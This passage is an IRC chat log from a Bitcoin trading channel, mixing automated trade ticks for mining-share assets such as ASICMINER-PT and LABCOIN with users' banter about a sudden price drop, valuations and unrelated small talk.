BTC [-] Aug 21 16:53:31 [BTCTC] [LABCOIN] 30 @ 0.002305 = 0.0692 BTC [+] Aug 21 16:53:32 [BTCTC] [LABCOIN] 20 @ 0.002305 = 0.0461 BTC [+] Aug 21 16:53:33 [HAVELOCK] [AM100] 294 @ 0.029 = 8.526 BTC [-] Aug 21 16:53:35 [BTCTC] [LABCOIN] 2092 @ 0.002304 = 4.82 BTC [-] Aug 21 16:53:36 Wow how low do we go Aug 21 16:53:36 [BTCTC] [LABCOIN] 9774 @ 0.002301 = 22.49 BTC [-] Aug 21 16:53:37 [HAVELOCK] [AM100] 11 @ 0.0284 = 0.3124 BTC [-] Aug 21 16:53:40 [BTCTC] [ASICMINER-PT] 1 @ 2.945 BTC [+] Aug 21 16:53:40 [BTCTC] [LABCOIN] 5000 @ 0.0023 = 11.5 BTC [-] Aug 21 16:53:41 [BTCTC] [LABCOIN] 24 @ 0.002274 = 0.0546 BTC [-] Aug 21 16:53:43 [BTCTC] [LABCOIN] 197 @ 0.002273 = 0.4478 BTC [-] Aug 21 16:53:44 [BTCTC] [LABCOIN] 625 @ 0.002271 = 1.4194 BTC [-] Aug 21 16:53:45 [BTCTC] [LABCOIN] 5000 @ 0.00227 = 11.35 BTC [-] Aug 21 16:53:46 [BTCTC] [LABCOIN] 500 @ 0.00225 = 1.125 BTC [-] Aug 21 16:53:47 [BTCTC] [LABCOIN] 1100 @ 0.00225 = 2.475 BTC [-] Aug 21 16:53:48 [BTCTC] [LABCOIN] 4509 @ 0.002213 = 9.9784 BTC [-] Aug 21 16:53:52 theres no liquidty down to 2.5 Aug 21 16:53:58 [BTCTC] [LABCOIN] 30 @ 0.002213 = 0.0664 BTC [-] Aug 21 16:54:00 [BTCTC] [ASICMINER-PT] 1 @ 2.946 BTC [+] Aug 21 16:54:24 [BTCTC] [ASICMINER-PT] 1 @ 2.943 BTC [-] Aug 21 16:54:26 [BTCTC] [ASICMINER-PT] 1 @ 2.942 BTC [-] Aug 21 16:54:55 dump moar Aug 21 16:55:02 I want some new cheap shares Aug 21 16:55:08 [BTCTC] [ASICMINER-PT] 1 @ 2.944 BTC [+] Aug 21 16:55:09 [BTCTC] [ASICMINER-PT] 1 @ 2.942 BTC [-] Aug 21 16:55:11 [BTCTC] [ASICMINER-PT] 1 @ 2.941 BTC [-] Aug 21 16:55:12 [BTCTC] [ASICMINER-PT] 1 @ 2.941 BTC [-] Aug 21 16:55:14 [BTCTC] [ASICMINER-PT] 1 @ 2.939 BTC [-] Aug 21 16:55:15 [MPEX] [S.MPOE] 10400 @ 0.00082936 = 8.6253 BTC [-] Aug 21 16:55:16 [BTCTC] [ASICMINER-PT] 1 @ 2.935 BTC [-] Aug 21 16:55:17 [BTCTC] [ASICMINER-PT] 2 @ 2.92 = 5.84 BTC [-] Aug 21 16:55:18 [BTCTC] [ASICMINER-PT] 1 @ 2.92 BTC [-] Aug 21 16:55:21 [BTCTC] [ASICMINER-PT] 1 @ 2.91 BTC [-] Aug 21 16:55:22 [BTCTC] [ASICMINER-PT] 2 @ 2.9 = 5.8 BTC [-] Aug 21 16:55:23 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Aug 21 16:55:25 [BTCTC] [ASICMINER-PT] 1 @ 2.875001 BTC [-] Aug 21 16:55:26 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Aug 21 16:55:27 [BTCTC] [ASICMINER-PT] 1 @ 2.76 BTC [-] Aug 21 16:55:29 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] Aug 21 16:55:30 [BTCTC] [ASICMINER-PT] 1 @ 2.946 BTC [+] Aug 21 16:55:32 good timing Aug 21 16:55:39 lol Aug 21 16:55:40 [BTCTC] [ASICMINER-PT] 1 @ 2.942 BTC [-] Aug 21 16:55:52 [BTCTC] [LABCOIN] 170 @ 0.002343 = 0.3983 BTC [+] Aug 21 16:55:56 my voice is command Aug 21 16:56:00 2.57 - 2.942 Aug 21 16:56:04 that spread! Aug 21 16:56:07 So juicy Aug 21 16:56:33 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [+] Aug 21 16:56:45 lol i shhould have taken options Aug 21 16:56:47 [HAVELOCK] [LABCO] 2 @ 0.002267 = 0.0045 BTC [-] Aug 21 16:56:51 [HAVELOCK] [LABCO] 2 @ 0.0022666 = 0.0045 BTC [-] Aug 21 16:56:54 [BTCTC] [LABCOIN] 15 @ 0.002213 = 0.0332 BTC [-] Aug 21 16:57:09 I actually had put options up, but no one was clever enough to buy them Aug 21 16:57:20 [BTCTC] [LABCOIN] 6 @ 0.002213 = 0.0133 BTC [-] Aug 21 16:57:33 [BTCTC] [ASICMINER-PT] 1 @ 2.602 BTC [-] Aug 21 16:57:35 [BTCTC] [ASICMINER-PT] 9 @ 2.601 = 23.409 BTC [-] Aug 21 16:57:54 [BTCTC] [LABCOIN] 29 @ 0.002212 = 0.0641 BTC [-] Aug 21 16:57:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.0278 = 0.1112 BTC [-] Aug 21 16:57:57 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [+] Aug 21 16:57:59 [BTCTC] [LABCOIN] 50 @ 0.002212 = 0.1106 BTC [-] Aug 21 16:57:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.027002 = 0.135 BTC [-] Aug 21 16:58:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.027 = 0.081 BTC [-] Aug 21 16:58:02 [BTCTC] [TAT.ASICMINER] 17 @ 0.027 = 0.459 BTC [-] Aug 21 16:58:14 [BTCTC] [LABCOIN] 85 @ 0.002337 = 0.1986 BTC [+] Aug 21 16:58:16 [BTCTC] [LABCOIN] 30 @ 0.002338 = 0.0701 BTC [+] Aug 21 16:58:17 [BTCTC] [LABCOIN] 541 @ 0.002343 = 1.2676 BTC [+] Aug 21 16:58:19 [BTCTC] [ACTIVEMINING] 48 @ 0.0052 = 0.2496 BTC [-] Aug 21 16:58:20 [BTCTC] [ACTIVEMINING] 23 @ 0.00515 = 0.1185 BTC [-] Aug 21 16:58:22 [BTCTC] [ACTIVEMINING] 1412 @ 0.005112 = 7.2181 BTC [-] Aug 21 16:58:34 [BTCTC] [ACTIVEMINING] 20 @ 0.005267 = 0.1053 BTC [+] Aug 21 16:58:58 [BTCTC] [TAT.ASICMINER] 8 @ 0.027 = 0.216 BTC [-] Aug 21 16:58:59 [BTCTC] [TAT.ASICMINER] 50 @ 0.027 = 1.35 BTC [-] Aug 21 16:59:17 all the 1s lol Aug 21 16:59:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.02701 = 0.054 BTC [+] Aug 21 16:59:33 1s? Aug 21 16:59:39 frb traditionally options are only bought when they lose money. Aug 21 16:59:44 [BTCTC] [DMS.SELLING] 1 @ 0.0175 BTC [-] Aug 21 16:59:46 yes, [ASICMINER-PT] 1 @ Aug 21 16:59:53 oh, right Aug 21 17:00:10 [HAVELOCK] [XBOND] 2 @ 0.00108609 = 0.0022 BTC [-] Aug 21 17:00:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.02779 BTC [+] Aug 21 17:00:28 [BTCTC] [ASICMINER-PT] 1 @ 2.899 BTC [-] Aug 21 17:00:33 [HAVELOCK] [XBOND] 1 @ 0.001086 BTC [-] Aug 21 17:00:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.02701 = 0.054 BTC [-] Aug 21 17:00:36 [BTCTC] [COGNITIVE] 1 @ 0.324 BTC [-] Aug 21 17:00:37 [BTCTC] [DMS.SELLING] 1 @ 0.01742 BTC [-] Aug 21 17:00:44 [BTCTC] [ASICMINER-PT] 3 @ 2.71 = 8.13 BTC [-] Aug 21 17:00:57 I'm buying at 2.4 Aug 21 17:01:14 [BTCTC] [ASICMINER-PT] 1 @ 3.25 BTC [+] Aug 21 17:01:15 [BTCTC] [LABCOIN] 30 @ 0.002212 = 0.0664 BTC [-] Aug 21 17:01:17 [BTCTC] [ASICMINER-PT] 1 @ 2.71 BTC [-] Aug 21 17:01:18 [BTCTC] [LABCOIN] 30 @ 0.002212 = 0.0664 BTC [-] Aug 21 17:01:20 [BTCTC] [LABCOIN] 60 @ 0.002212 = 0.1327 BTC [-] Aug 21 17:01:27 [BTCTC] [ASICMINER-PT] 3 @ 2.71 = 8.13 BTC [-] Aug 21 17:01:41 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [+] Aug 21 17:01:42 [BTCTC] [BASIC-MINING] 1 @ 0.254 BTC [-] Aug 21 17:01:49 [BTCTC] [DMS.SELLING] 83 @ 0.0174 = 1.4442 BTC [-] Aug 21 17:01:50 [BTCTC] [DMS.SELLING] 1 @ 0.0174 BTC [-] Aug 21 17:01:53 [BTCTC] [ASICMINER-PT] 1 @ 2.899 BTC [-] Aug 21 17:01:57 [BTCTC] [LABCOIN] 25 @ 0.002213 = 0.0553 BTC [+] Aug 21 17:01:59 [HAVELOCK] [XBOND] 1100 @ 0.001085 = 1.1935 BTC [-] Aug 21 17:02:14 [BTCTC] [ASICMINER-PT] 1 @ 2.711 BTC [-] Aug 21 17:02:16 [BTCTC] [ASICMINER-PT] 1 @ 2.71 BTC [-] Aug 21 17:02:17 [BTCTC] [ASICMINER-PT] 2 @ 2.71 = 5.42 BTC [-] Aug 21 17:02:19 [HAVELOCK] [XBOND] 2 @ 0.00108022 = 0.0022 BTC [-] Aug 21 17:02:24 [BTCTC] [ASICMINER-PT] 1 @ 2.711 BTC [+] Aug 21 17:02:25 [BTCTC] [ASICMINER-PT] 1 @ 2.71 BTC [-] Aug 21 17:02:27 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [-] Aug 21 17:02:38 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Aug 21 17:02:38 [BTCTC] [LABCOIN] 60 @ 0.002215 = 0.1329 BTC [+] Aug 21 17:02:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.027 = 0.054 BTC [-] Aug 21 17:02:42 [BTCTC] [LABCOIN] 15 @ 0.002214 = 0.0332 BTC [-] Aug 21 17:02:44 [BTCTC] [LABCOIN] 50 @ 0.002211 = 0.1106 BTC [-] Aug 21 17:02:46 [BTCTC] [LABCOIN] 175 @ 0.00221 = 0.3868 BTC [-] Aug 21 17:02:57 [BTCTC] [DMS.SELLING] 16 @ 0.01733 = 0.2773 BTC [-] Aug 21 17:02:58 [BTCTC] [DMS.SELLING] 10 @ 0.01721 = 0.1721 BTC [-] Aug 21 17:03:00 [BTCTC] [DMS.SELLING] 50 @ 0.0172 = 0.86 BTC [-] Aug 21 17:03:03 [BTCTC] [DMS.SELLING] 18 @ 0.01712 = 0.3082 BTC [-] Aug 21 17:03:05 [BTCTC] [DMS.SELLING] 100 @ 0.01711 = 1.711 BTC [-] Aug 21 17:03:05 [BTCTC] [DMS.SELLING] 48 @ 0.017 = 0.816 BTC [-] Aug 21 17:03:06 [BTCTC] [DMS.SELLING] 40 @ 0.01681 = 0.6724 BTC [-] Aug 21 17:03:30 [BTCTC] [DMS.SELLING] 222 @ 0.01675 = 3.7185 BTC [-] Aug 21 17:03:45 [HAVELOCK] [XBOND] 10 @ 0.00108021 = 0.0108 BTC [-] Aug 21 17:04:04 [HAVELOCK] [XBOND] 38 @ 0.00108 = 0.041 BTC [-] Aug 21 17:04:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.02775 = 1.3875 BTC [+] Aug 21 17:04:18 [BTCTC] [ASICMINER-PT] 1 @ 2.906 BTC [+] Aug 21 17:04:23 [HAVELOCK] [XBOND] 500 @ 0.001079 = 0.5395 BTC [-] Aug 21 17:04:27 [HAVELOCK] [XBOND] 400 @ 0.001075 = 0.43 BTC [-] Aug 21 17:04:31 [HAVELOCK] [XBOND] 1 @ 0.0010742 BTC [-] Aug 21 17:04:33 [HAVELOCK] [XBOND] 3 @ 0.001072 = 0.0032 BTC [-] Aug 21 17:04:36 [BTCTC] [TAT.ASICMINER] 31 @ 0.02599 = 0.8057 BTC [-] Aug 21 17:04:37 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [+] Aug 21 17:04:39 [HAVELOCK] [XBOND] 6 @ 0.00107002 = 0.0064 BTC [-] Aug 21 17:04:42 [HAVELOCK] [XBOND] 454 @ 0.00107 = 0.4858 BTC [-] Aug 21 17:04:45 [HAVELOCK] [XBOND] 256 @ 0.00106521 = 0.2727 BTC [-] Aug 21 17:04:48 [HAVELOCK] [XBOND] 404 @ 0.00106001 = 0.4282 BTC [-] Aug 21 17:04:52 [HAVELOCK] [XBOND] 500 @ 0.00106 = 0.53 BTC [-] Aug 21 17:04:55 [HAVELOCK] [XBOND] 1 @ 0.001055 BTC [-] Aug 21 17:04:59 [BTCTC] [TAT.ASICMINER] 36 @ 0.02599 = 0.9356 BTC [-] Aug 21 17:05:00 [HAVELOCK] [XBOND] 7756 @ 0.001054 = 8.1748 BTC [-] Aug 21 17:05:01 [BTCTC] [TAT.ASICMINER] 31 @ 0.026 = 0.806 BTC [+] Aug 21 17:05:24 haha, and now bitfunder decides to do maintenance, I can already hear the complaints Aug 21 17:05:41 [BTCTC] [ASICMINER-PT] 1 @ 2.907 BTC [-] Aug 21 17:05:42 [BTCTC] [ASICMINER-PT] 1 @ 2.907 BTC [-] Aug 21 17:05:44 [BTCTC] [ASICMINER-PT] 2 @ 2.91 = 5.82 BTC [+] Aug 21 17:05:45 [BTCTC] [ASICMINER-PT] 1 @ 2.929 BTC [+] Aug 21 17:05:58 [BTCTC] [TAT.ASICMINER] 30 @ 0.02773 = 0.8319 BTC [+] Aug 21 17:06:14 "maintenance" Aug 21 17:06:16 lol Aug 21 17:06:27 [BTCTC] [TAT.ASICMINER] 36 @ 0.02771 = 0.9976 BTC [-] Aug 21 17:06:52 [BTCTC] [ASICMINER-PT] 1 @ 2.92 BTC [-] Aug 21 17:06:53 [BTCTC] [BASIC-MINING] 3 @ 0.254 = 0.762 BTC [-] Aug 21 17:07:37 [BTCTC] [TAT.ASICMINER] 30 @ 0.02771 = 0.8313 BTC [-] Aug 21 17:07:57 [BTCTC] [TAT.ASICMINER] 25 @ 0.0277 = 0.6925 BTC [-] Aug 21 17:07:58 [BTCTC] [ASICMINER-PT] 5 @ 2.75 = 13.75 BTC [-] Aug 21 17:08:00 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [-] Aug 21 17:08:01 [BTCTC] [ASICMINER-PT] 3 @ 2.725 = 8.175 BTC [-] Aug 21 17:08:03 [BTCTC] [ASICMINER-PT] 1 @ 2.725 BTC [-] Aug 21 17:08:04 [BTCTC] [ASICMINER-PT] 3 @ 2.723 = 8.169 BTC [-] Aug 21 17:08:05 [BTCTC] [ASICMINER-PT] 3 @ 2.722 = 8.166 BTC [-] Aug 21 17:08:06 [BTCTC] [ASICMINER-PT] 1 @ 2.722 BTC [-] Aug 21 17:08:08 [BTCTC] [ASICMINER-PT] 9 @ 2.721 = 24.489 BTC [-] Aug 21 17:08:09 [BTCTC] [ASICMINER-PT] 2 @ 2.71 = 5.42 BTC [-] Aug 21 17:08:10 [BTCTC] [TAT.ASICMINER] 22 @ 0.0277 = 0.6094 BTC [-] Aug 21 17:08:10 [BTCTC] [ASICMINER-PT] 1 @ 2.701 BTC [-] Aug 21 17:08:11 [BTCTC] [ASICMINER-PT] 3 @ 2.7 = 8.1 BTC [-] Aug 21 17:08:12 [BTCTC] [ASICMINER-PT] 2 @ 2.69 = 5.38 BTC [-] Aug 21 17:08:14 [BTCTC] [ASICMINER-PT] 1 @ 2.625 BTC [-] Aug 21 17:08:15 [BTCTC] [ASICMINER-PT] 1 @ 2.625 BTC [-] Aug 21 17:08:16 [BTCTC] [ASICMINER-PT] 2 @ 2.624 = 5.248 BTC [-] Aug 21 17:08:17 [BTCTC] [ASICMINER-PT] 1 @ 2.624 BTC [-] Aug 21 17:08:24 2.5 may be soon Aug 21 17:08:26 [BTCTC] [ASICMINER-PT] 1 @ 3.59 BTC [+] Aug 21 17:08:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0277 BTC [-] Aug 21 17:08:40 lmao it just dropped a third over what, 100 btc volume ? Aug 21 17:08:48 mircea_popescu: yup :) Aug 21 17:08:50 help mircea Aug 21 17:08:56 there go about 100k btc worth of imaginary wealth. Aug 21 17:08:57 do some neo stuff Aug 21 17:09:04 [BTCTC] [LABCOIN] 25 @ 0.00228 = 0.057 BTC [+] Aug 21 17:09:05 [BTCTC] [TAT.ASICMINER] 7 @ 0.02769 = 0.1938 BTC [-] Aug 21 17:09:18 [BTCTC] [LABCOIN] 5 @ 0.00228 = 0.0114 BTC [+] Aug 21 17:09:21 [BTCTC] [LABCOIN] 500 @ 0.002301 = 1.1505 BTC [+] Aug 21 17:09:22 [BTCTC] [ASICMINER-PT] 3 @ 3.75 = 11.25 BTC [+] Aug 21 17:09:29 VanCleef srsly, asicminer is still worth abotu what the girl said, .75 to 1.5 tops Aug 21 17:09:45 minus whatever discounts you want to apply since that was in may and some cream has been skimmed. Aug 21 17:09:54 0.01226019 << dividend for this week Aug 21 17:10:01 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Aug 21 17:10:39 [BTCTC] [TAT.ASICMINER] 11 @ 0.02766 = 0.3043 BTC [-] Aug 21 17:10:40 [BTCTC] [LABCOIN] 30 @ 0.002296 = 0.0689 BTC [-] Aug 21 17:10:42 ;;calc 0.01226019/0.75*100 Aug 21 17:10:42 1.634692 Aug 21 17:10:44 [BTCTC] [LABCOIN] 14 @ 0.002296 = 0.0321 BTC [-] Aug 21 17:10:45 [BTCTC] [TAT.ASICMINER] 54 @ 0.02766 = 1.4936 BTC [-] Aug 21 17:10:46 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Aug 21 17:10:47 [BTCTC] [ASICMINER-PT] 2 @ 2.9 = 5.8 BTC [+] Aug 21 17:10:47 [BTCTC] [LABCOIN] 85 @ 0.002297 = 0.1952 BTC [+] Aug 21 17:10:55 hehe Aug 21 17:10:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.02766 = 0.0553 BTC [-] Aug 21 17:10:59 [BTCTC] [LABCOIN] 179 @ 0.002299 = 0.4115 BTC [+] Aug 21 17:11:01 [BTCTC] [LABCOIN] 192 @ 0.0023 = 0.4416 BTC [+] Aug 21 17:11:03 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Aug 21 17:11:04 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Aug 21 17:11:18 [BTCTC] [ASICMINER-PT] 1 @ 2.899 BTC [+] Aug 21 17:11:40 [BTCTC] [TAT.ASICMINER] 6 @ 0.02767 = 0.166 BTC [+] Aug 21 17:11:44 1.5 sounds about right Aug 21 17:11:57 thanks mpex pr chicks mwah Aug 21 17:12:01 -s Aug 21 17:12:06 mircea_popescu: can you share a link to the am analysis? Aug 21 17:12:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.0277 = 0.0554 BTC [+] Aug 21 17:12:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.0278 = 0.1112 BTC [+] Aug 21 17:12:35 [BTCTC] [ASICMINER-PT] 1 @ 3.25 BTC [+] Aug 21 17:12:45 All I know is I'm glad I sold off all my AM some time ago Aug 21 17:13:13 [BTCTC] [DMS.PURCHASE] 2 @ 0.02061 = 0.0412 BTC [+] Aug 21 17:13:15 And to think I was worrying about selling too soon at 4.5. :D Aug 21 17:13:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.02898 BTC [+] Aug 21 17:14:05 [HAVELOCK] [AM100] 100 @ 0.029 = 2.9 BTC [+] Aug 21 17:14:16 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Aug 21 17:14:56 [BTCTC] [TAT.ASICMINER] 40 @ 0.02896 = 1.1584 BTC [-] Aug 21 17:15:10 [BTCTC] [ASICMINER-PT] 2 @ 3.59 = 7.18 BTC [+] Aug 21 17:15:29 [HAVELOCK] [AM100] 3 @ 0.029 = 0.087 BTC [+] Aug 21 17:15:48 Ah reddit is down, what am i suppose to do at work now. Aug 21 17:16:02 [BTCTC] [DMS.PURCHASE] 100 @ 0.02061 = 2.061 BTC [+] Aug 21 17:16:06 [BTCTC] [BASIC-MINING] 1 @ 0.2541 BTC [+] Aug 21 17:16:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.02896 = 0.1448 BTC [-] Aug 21 17:16:25 [BTCTC] [BTC-TRADING-PT] 1 @ 0.9 BTC [-] Aug 21 17:16:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.02895 = 0.0579 BTC [-] Aug 21 17:16:57 [BTCTC] [BTC-GROWTH] 2 @ 0.0985 = 0.197 BTC [-] Aug 21 17:16:59 [BTCTC] [BTC-GROWTH] 2 @ 0.098 = 0.196 BTC [-] Aug 21 17:17:00 [BTCTC] [BTC-GROWTH] 13 @ 0.09722 = 1.2639 BTC [-] Aug 21 17:17:01 [BTCTC] [BTC-GROWTH] 13 @ 0.09721 = 1.2637 BTC [-] Aug 21 17:17:32 [BTCTC] [ACTIVEMINING] 6 @ 0.005225 = 0.0314 BTC [-] Aug 21 17:17:34 [BTCTC] [BTC-GROWTH] 17 @ 0.09721 = 1.6526 BTC [-] Aug 21 17:17:36 [BTCTC] [BTC-GROWTH] 33 @ 0.0972 = 3.2076 BTC [-] Aug 21 17:17:58 [BTCTC] [TAT.ASICMINER] 11 @ 0.02897 = 0.3187 BTC [+] Aug 21 17:18:00 [BTCTC] [ACTIVEMINING] 15 @ 0.005226 = 0.0784 BTC [+] Aug 21 17:18:02 [BTCTC] [TAT.ASICMINER] 56 @ 0.02897 = 1.6223 BTC [+] Aug 21 17:18:03 [BTCTC] [ACTIVEMINING] 444 @ 0.005225 = 2.3199 BTC [-] Aug 21 17:18:05 [BTCTC] [TAT.ASICMINER] 44 @ 0.02899 = 1.2756 BTC [+] Aug 21 17:18:06 dexX7 k one sec Aug 21 17:18:06 [BTCTC] [ACTIVEMINING] 2000 @ 0.0052 = 10.4 BTC [-] Aug 21 17:18:07 [BTCTC] [ACTIVEMINING] 3341 @ 0.00511 = 17.0725 BTC [-] Aug 21 17:18:23 [HAVELOCK] [AM1] 1 @ 3.250001 BTC [+] Aug 21 17:18:30 thanks :) Aug 21 17:18:39 Rulother you could start playing eve... Aug 21 17:18:42 with our bitcoin corp! Aug 21 17:18:52 [BTCTC] [ACTIVEMINING] 30 @ 0.005292 = 0.1588 BTC [+] Aug 21 17:19:00 I played eve for a while, through beta and a bit after. Aug 21 17:19:06 It consumed my soul Aug 21 17:19:14 [BTCTC] [TAT.ASICMINER] 6 @ 0.02895 = 0.1737 BTC [-] Aug 21 17:19:26 this channel is for people w/o souls. Aug 21 17:19:28 [BTCTC] [ASICMINER-PT] 1 @ 2.908 BTC [-] Aug 21 17:19:29 [BTCTC] [ASICMINER-PT] 1 @ 2.91 BTC [+] Aug 21 17:19:32 [BTCTC] [DMS.PURCHASE] 100 @ 0.02061 = 2.061 BTC [+] Aug 21 17:19:48 [BTCTC] [LABCOIN] 85 @ 0.002223 = 0.189 BTC [-] Aug 21 17:19:50 [BTCTC] [LABCOIN] 20 @ 0.002222 = 0.0444 BTC [-] Aug 21 17:20:16 [BTCTC] [LABCOIN] 703 @ 0.00222 = 1.5607 BTC [-] Aug 21 17:20:17 [BTCTC] [ACTIVEMINING] 698 @ 0.005111 = 3.5675 BTC [-] Aug 21 17:20:32 [BTCTC] [ACTIVEMINING] 3492 @ 0.00511 = 17.8441 BTC [-] Aug 21 17:20:45 [BTCTC] [DMS.PURCHASE] 98 @ 0.02061 = 2.0198 BTC [+] Aug 21 17:20:46 [BTCTC] [ASICMINER-PT] 1 @ 2.914 BTC [+] Aug 21 17:20:47 [BTCTC] [ACTIVEMINING] 482 @ 0.005101 = 2.4587 BTC [-] Aug 21 17:20:50 [BTCTC] [ACTIVEMINING] 410 @ 0.0051 = 2.091 BTC [-] Aug 21 17:20:52 [BTCTC] [ACTIVEMINING] 2000 @ 0.0051 = 10.2 BTC [-] Aug 21 17:20:53 [BTCTC] [ACTIVEMINING] 30 @ 0.0051 = 0.153 BTC [-] Aug 21 17:21:08 [BTCTC] [ASICMINER-PT] 1 @ 2.915 BTC [+] Aug 21 17:21:09 [BTCTC] [ASICMINER-PT] 1 @ 2.92 BTC [+] Aug 21 17:21:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.029 = 0.174 BTC [+] Aug 21 17:21:37 why is activemining tumbling btw Aug 21 17:21:55 people trying to get cheap AM Aug 21 17:21:57 [BTCTC] [ASICMINER-PT] 1 @ 2.936 BTC [+] Aug 21 17:21:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.02901 = 0.1451 BTC [+] Aug 21 17:22:05 [BTCTC] [ASICMINER-PT] 1 @ 2.937 BTC [+] Aug 21 17:22:05 It kind of makes sense. BTC is up. AM is just static for a long time so a couple big holders look to cash out and cause a sell off. << probably most accurate guess i have seen Aug 21 17:22:06 [BTCTC] [TAT.ASICMINER] 30 @ 0.02901 = 0.8703 BTC [+] Aug 21 17:22:07 [BTCTC] [ACTIVEMINING] 72 @ 0.005053 = 0.3638 BTC [-] Aug 21 17:22:07 as soon as ACTM sold AM got bought Aug 21 17:22:08 [BTCTC] [ASICMINER-PT] 2 @ 2.98 = 5.96 BTC [+] Aug 21 17:22:09 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Aug 21 17:22:09 [BTCTC] [ACTIVEMINING] 363 @ 0.005052 = 1.8339 BTC [-] Aug 21 17:22:10 [BTCTC] [ACTIVEMINING] 400 @ 0.005011 = 2.0044 BTC [-] Aug 21 17:22:11 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Aug 21 17:22:12 [BTCTC] [ACTIVEMINING] 1000 @ 0.00501 = 5.01 BTC [-] Aug 21 17:22:14 [BTCTC] [ASICMINER-PT] 4 @ 2.936 = 11.744 BTC [-] Aug 21 17:22:24 [BTCTC] [ASICMINER-PT] 1 @ 3.098 BTC [+] Aug 21 17:22:28 [BTCTC] [TAT.ASICMINER] 33 @ 0.02901 = 0.9573 BTC [+] Aug 21 17:22:29 [BTCTC] [ACTIVEMINING] 1 @ 0.005007 BTC [-] Aug 21 17:22:30 [BTCTC] [ASICMINER-PT] 1 @ 3.098 BTC [+] Aug 21 17:22:36 [BTCTC] [ACTIVEMINING] 1000 @ 0.005006 = 5.006 BTC [-] Aug 21 17:22:36 [BTCTC] [ACTIVEMINING] 67 @ 0.005004 = 0.3353 BTC [-] Aug 21 17:22:37 [BTCTC] [BASIC-MINING] 1 @ 0.2543 BTC [+] Aug 21 17:22:39 [BTCTC] [ACTIVEMINING] 284 @ 0.005003 = 1.4209 BTC [-] Aug 21 17:22:41 [BTCTC] [ACTIVEMINING] 3 @ 0.005 = 0.015 BTC [-] Aug 21 17:22:42 [BTCTC] [ACTIVEMINING] 298 @ 0.005 = 1.49 BTC [-] Aug 21 17:22:55 [BTCTC] [TAT.ASICMINER] 30 @ 0.03298 = 0.9894 BTC [+] Aug 21 17:23:27 [BTCTC] [ACTIVEMINING] 150 @ 0.005001 = 0.7502 BTC [+] Aug 21 17:23:28 matuszed seems you're right. Aug 21 17:23:38 [BTCTC] [ASICMINER-PT] 1 @ 3.197 BTC [+] Aug 21 17:23:39 [BTCTC] [ASICMINER-PT] 1 @ 3.198 BTC [+] Aug 21 17:24:01 [HAVELOCK] [AM100] 3 @ 0.029 = 0.087 BTC [+] Aug 21 17:24:47 [BTCTC] [ASICMINER-PT] 2 @ 3.377 = 6.754 BTC [+] Aug 21 17:24:48 [BTCTC] [BASIC-MINING] 1 @ 0.2543 BTC [+] Aug 21 17:24:48 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [+] Aug 21 17:24:50 [BTCTC] [ASICMINER-PT] 3 @ 3.396 = 10.188 BTC [+] Aug 21 17:24:59 and were back Aug 21 17:25:16 Graet well they wouldn't be such big holders, the entire thing tipped over what, not even 100 btc. Aug 21 17:25:16 [BTCTC] [ASICMINER-PT] 1 @ 3.396 BTC [+] Aug 21 17:25:17 [BTCTC] [BTC-GROWTH] 1 @ 0.0972 BTC [-] Aug 21 17:25:23 [BTCTC] [COGNITIVE] 1 @ 0.324 BTC [-] Aug 21 17:25:25 [BTCTC] [COGNITIVE] 1 @ 0.324 BTC [-] Aug 21 17:25:45 [BTCTC] [ASICMINER-PT] 4 @ 3.34 = 13.36 BTC [-] Aug 21 17:25:47 [BTCTC] [BASIC-MINING] 1 @ 0.2542 BTC [-] Aug 21 17:25:49 sure, nice time to cash out 100btc tho ;) Aug 21 17:25:57 [BTCTC] [ASICMINER-PT] 1 @ 3.396 BTC [+] Aug 21 17:26:10 [BTCTC] [ASICMINER-PT] 1 @ 3.397 BTC [+] Aug 21 17:26:19 [HAVELOCK] [AM100] 10 @ 0.0319 = 0.319 BTC [+] Aug 21 17:26:53 [BTCTC] [BASIC-MINING] 1 @ 0.254 BTC [-] Aug 21 17:26:54 [BTCTC] [ACTIVEMINING] 50 @ 0.005 = 0.25 BTC [-] Aug 21 17:27:10 [BTCTC] [COGNITIVE] 1 @ 0.323 BTC [-] Aug 21 17:27:11 [BTCTC] [COGNITIVE] 1 @ 0.323 BTC [-] Aug 21 17:27:13 [BTCTC] [COGNITIVE] 3 @ 0.3206 = 0.9618 BTC [-] Aug 21 17:27:14 [BTCTC] [COGNITIVE] 3 @ 0.32 = 0.96 BTC [-] Aug 21 17:27:15 [BTCTC] [COGNITIVE] 2 @ 0.3163 = 0.6326 BTC [-] Aug 21 17:27:16 [BTCTC] [COGNITIVE] 10 @ 0.3162 = 3.162 BTC [-] Aug 21 17:27:22 [HAVELOCK] [XBOND] 19 @ 0.00115 = 0.0219 BTC [+] Aug 21 17:27:35 [BTCTC] 